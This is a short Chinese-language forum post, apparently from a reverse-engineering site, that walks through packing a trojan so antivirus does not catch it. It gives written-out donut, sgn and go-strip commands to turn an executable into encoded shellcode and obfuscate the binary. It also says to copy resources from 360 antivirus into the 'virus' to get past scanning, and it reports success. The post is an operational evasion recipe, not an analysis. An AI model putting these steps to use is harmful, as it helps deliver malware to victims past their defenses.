donut.exe -i calc.exe -a 2(x64是2,x86是1) 把exe转换成.bin(测试时将calc.exe替换成木马)
sgn.exe -a 64(64位系统) -c 5(等待时间为5) shellcode.bin
上线成功: 使用到的工具下载地址:8baK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6f1K9r3g2i4L8%4k6W2M7W2)9J5c8X3c8G2L8Y4g2@12c9K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6Z5j5i4y4Z5k6i4u0W2P5X3q4V1k6g2)9J5c8Y4m8W2i4K6g2X3N6r3!0Q4y4h3k6K6K9r3g2D9L8r3y4G2k6r3g2Q4x3V1k6J5k6h3I4W2j5i4y4W2M7#2)9J5c8Y4c8S2k6#2)9J5c8Y4j5I4i4K6u0W2x3R3`.`.
使用到的工具:d4cK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6T1L8%4W2Q4x3X3c8Z5j5h3y4C8i4K6u0r3k6$3!0Q4x3X3c8K6N6s2u0A6M7l9`.`.go-strip -f binary.exe -a -output new.exenew.exe即是混淆后的二进制文件
开始之前先用360扫一下该病毒,报毒: 使用Resource Hacker将任意一个360的资源保存下来项目下载地址:ba0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3q4F1k6%4g2K6K9W2)9J5k6h3y4G2L8g2)9J5c8Y4u0W2M7$3!0#2M7X3y4W2K9r3q4U0K9$3g2J5i4K6u0r3 将保存下来的资源导入到病毒中 成功过杀软
[培训]科锐逆向工程师培训第53期2025年7月8日开班!